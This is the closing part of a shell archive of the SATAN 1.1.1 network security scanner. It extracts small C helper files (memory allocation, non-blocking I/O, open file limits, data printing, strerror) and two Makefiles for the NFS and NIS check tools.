X rm -f $(PROG) *.o core $(MAKES)
X
Xnfs-chk.o: mount.h nfs_prot.h
END_OF_FILE
if test 712 -ne `wc -c <'satan-1.1.1/src/nfs-chk/Makefile'`; then
echo shar: \"'satan-1.1.1/src/nfs-chk/Makefile'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/src/nfs-chk/Makefile'
fi
if test -f 'satan-1.1.1/src/port_scan/mallocs.c' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/src/port_scan/mallocs.c'\"
else
echo shar: Extracting \"'satan-1.1.1/src/port_scan/mallocs.c'\" $737 characters$
sed "s/^X//" >'satan-1.1.1/src/port_scan/mallocs.c' <<'END_OF_FILE'
X /*
X * mymalloc, myrealloc, dupstr - memory allocation with error handling
X *
X * Environment: POSIX, ANSI

X *
X * Author: Wietse Venema.
X */
X

X#include <stdlib.h>
X#include <unistd.h>
X#include <string.h>

X
X#include "lib.h"
X
X/* mymalloc - allocate memory or bust */
X
Xchar *mymalloc(len)
Xint len;
X{
X char *ptr;
X
X if ((ptr = malloc(len)) == 0)
X error("Insufficient memory: %m");
X return (ptr);
X}
X
X/* myrealloc - reallocate memory or bust */
X
Xchar *myrealloc(ptr, len)
Xchar *ptr;
Xint len;
X{
X if ((ptr = realloc(ptr, len)) == 0)
X error("Insufficient memory: %m");
X return (ptr);
X}
X
X/* dupstr - save string to heap */
X
Xchar *dupstr(str)
Xchar *str;
X{
X return (strcpy(mymalloc(strlen(str) + 1), str));
X}
END_OF_FILE
if test 737 -ne `wc -c <'satan-1.1.1/src/port_scan/mallocs.c'`; then
echo shar: \"'satan-1.1.1/src/port_scan/mallocs.c'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/src/port_scan/mallocs.c'
fi
if test -f 'satan-1.1.1/src/port_scan/non_blocking.c' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/src/port_scan/non_blocking.c'\"
else
echo shar: Extracting \"'satan-1.1.1/src/port_scan/non_blocking.c'\" $490 characters$
sed "s/^X//" >'satan-1.1.1/src/port_scan/non_blocking.c' <<'END_OF_FILE'
X /*
X * non_blocking - set/clear open file non-blocking I/O flag
X *
X * Environment: POSIX, 43BSD

X *
X * Author: Wietse Venema.
X */
X
X#include <sys/types.h>

X#include <fcntl.h>
X
X/* Backwards compatibility */
X#ifdef FNDELAY
X#define PATTERN FNDELAY
X#else
X#define PATTERN O_NONBLOCK
X#endif
X
Xnon_blocking(fd, on)
Xint fd;
Xint on;
X{
X int flags;
X
X if ((flags = fcntl(fd, F_GETFL, 0)) < 0)
X return -1;
X return fcntl(fd, F_SETFL, on ? flags | PATTERN : flags & ~PATTERN);
X}
X
END_OF_FILE
if test 490 -ne `wc -c <'satan-1.1.1/src/port_scan/non_blocking.c'`; then
echo shar: \"'satan-1.1.1/src/port_scan/non_blocking.c'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/src/port_scan/non_blocking.c'
fi
if test -f 'satan-1.1.1/src/port_scan/open_limit.c' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/src/port_scan/open_limit.c'\"
else
echo shar: Extracting \"'satan-1.1.1/src/port_scan/open_limit.c'\" $483 characters$
sed "s/^X//" >'satan-1.1.1/src/port_scan/open_limit.c' <<'END_OF_FILE'
X /*
X * open_limit - determine the current open file limit
X *
X * Environment: POSIX, 44BSD, 43BSD

X *
X * Author: Wietse Venema.
X */
X
X#include <sys/types.h>

X#include <sys/time.h>
X#include <sys/resource.h>
X
X/* 44BSD compatibility. */
X#ifdef RLIMIT_OFILE
X#define RLIMIT_NOFILE RLIMIT_OFILE
X#endif
X
Xint open_limit()
X{
X#ifdef RLIMIT_NOFILE
X struct rlimit rl;
X
X getrlimit(RLIMIT_NOFILE, &rl);
X return (rl.rlim_cur);
X#else
X return (getdtablesize());
X#endif
X}
X
END_OF_FILE
if test 483 -ne `wc -c <'satan-1.1.1/src/port_scan/open_limit.c'`; then
echo shar: \"'satan-1.1.1/src/port_scan/open_limit.c'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/src/port_scan/open_limit.c'
fi
if test -f 'satan-1.1.1/src/port_scan/print_data.c' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/src/port_scan/print_data.c'\"
else
echo shar: Extracting \"'satan-1.1.1/src/port_scan/print_data.c'\" $588 characters$
sed "s/^X//" >'satan-1.1.1/src/port_scan/print_data.c' <<'END_OF_FILE'
X /*
X * print_data - print random data in printable form

X *
X * Author: Wietse Venema.
X */
X

X#include <stdio.h>
X#include <ctype.h>
X
X#include "lib.h"
X
Xvoid print_data(fp, buf, len)
XFILE *fp;
Xchar *buf;
Xint len;

X{
X int c;
X

X while (len-- > 0) {
X c = (*buf++ & 0377);

X if (c == '\t') {

X fputs("\\t", fp);
X } else if (c == '\n') {
X fputs("\\n", fp);
X } else if (c == '\r') {
X fputs("\\r", fp);
X } else if (c == '\\') {
X fputs("\\\\", fp);
X } else if ((c & 0177) == c && isprint(c)) {
X putc(c, fp);
X } else {
X fprintf(fp, "\\%03d", c);
X }
X }
X}
END_OF_FILE
if test 588 -ne `wc -c <'satan-1.1.1/src/port_scan/print_data.c'`; then
echo shar: \"'satan-1.1.1/src/port_scan/print_data.c'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/src/port_scan/print_data.c'
fi
if test -f 'satan-1.1.1/src/port_scan/strerror.c' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/src/port_scan/strerror.c'\"
else
echo shar: Extracting \"'satan-1.1.1/src/port_scan/strerror.c'\" $344 characters$
sed "s/^X//" >'satan-1.1.1/src/port_scan/strerror.c' <<'END_OF_FILE'
X /*
X * strerror - translate error number to string

X *
X * Author: Wietse Venema.
X */
X

Xextern char *sys_errlist[];
Xextern int sys_nerr;
X
Xchar *strerror(err)
Xint err;
X{
X static char buf[20];
X
X if (err < sys_nerr && err > 0) {
X return (sys_errlist[err]);
X } else {
X sprintf(buf, "Unknown error %d", err);
X return (buf);
X }
X}
END_OF_FILE
if test 344 -ne `wc -c <'satan-1.1.1/src/port_scan/strerror.c'`; then
echo shar: \"'satan-1.1.1/src/port_scan/strerror.c'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/src/port_scan/strerror.c'
fi
if test -f 'satan-1.1.1/src/yp-chk/Makefile' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/src/yp-chk/Makefile'\"
else
echo shar: Extracting \"'satan-1.1.1/src/yp-chk/Makefile'\" $400 characters$
sed "s/^X//" >'satan-1.1.1/src/yp-chk/Makefile' <<'END_OF_FILE'

XSHELL = /bin/sh
XBIN = ../../bin

XOBJECTS = yp-chk.o yp_clnt.o yp_xdr.o
XMAKES = yp.h yp_clnt.c yp_svc.c yp_xdr.c
XPROG = $(BIN)/yp-chk
XCFLAGS = -O -I. $(XFLAGS)
XXFLAGS = -DAUTH_GID_T=int
XRPCGEN = rpcgen

X#LIBS = -lsocket -lnsl
X

X$(PROG):$(OBJECTS)
X $(CC) $(CFLAGS) -o $@ $(OBJECTS) $(LIBS)
X
Xyp.h yp_clnt.c yp_xdr.c: yp.x
X $(RPCGEN) $? 2>/dev/null
X
Xclean:
X rm -f $(PROG) *.o core $(MAKES)
X
Xyp-chk.o: yp.h
END_OF_FILE
if test 400 -ne `wc -c <'satan-1.1.1/src/yp-chk/Makefile'`; then
echo shar: \"'satan-1.1.1/src/yp-chk/Makefile'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/src/yp-chk/Makefile'
fi
echo shar: End of archive 15 $of 15$.
cp /dev/null ark15isdone

0 new messages